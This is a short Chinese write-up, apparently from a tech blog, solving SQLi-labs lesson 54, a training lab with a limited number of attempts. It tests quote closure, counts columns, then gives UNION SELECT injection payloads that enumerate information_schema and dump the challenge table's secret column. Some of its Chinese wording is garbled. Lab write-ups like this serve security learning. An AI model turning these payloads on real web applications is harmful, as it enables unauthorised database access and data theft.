SQL注入 Less54(限制次数的SQL注入+union注入)
来源:http://www.tudoupe.com时间:2022-07-31
SQL注射限制频率
每次重新设置时,数据库的表名、字段名和数据都会发生变化
?id=1
?id=1'
发现没有报错信息
?id=1"
返回正常,直接识别双进制开关的关闭方法
?id=1'--+
?id=1')--+
?id=1'))--+
参考数返回正常,所以它是参考数关闭
?id=1' order by 3--+回显正常
?id=1' order by 4--+回显错误
所以有三列
?id=-1' union select 1,version(),database()--+

?id=-1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database())--+

?id=-1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema="challenges" and table_name="470aojlrx1")--+

?id=-1' union select 1,2,(select group_concat(id,sessid,secret_KJU8,tryy) from 470aojlrx1)--+

相关新闻
- 2022-08-04 WPF的由来
- 2022-08-04 Win11勒索软件防护怎么打开?Win11安
- 2022-08-04 Windows系统jdk的配置
- 2022-08-04 Windows10 OneNote怎么重新登录?如何重
- 2022-08-04 超好用的 Windows 效率工具推荐
- 2022-08-04 Windows如何在CMD或PowerShell中配置代理
- 2022-08-04 powershell和cmd对比
- 2022-08-04 【QT】Windows下QT下载安装
- 2022-08-04 windows下 C++ 实现类属性的get和set方
- 2022-08-04 Win11快速助手在哪里?Win11打开快速
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
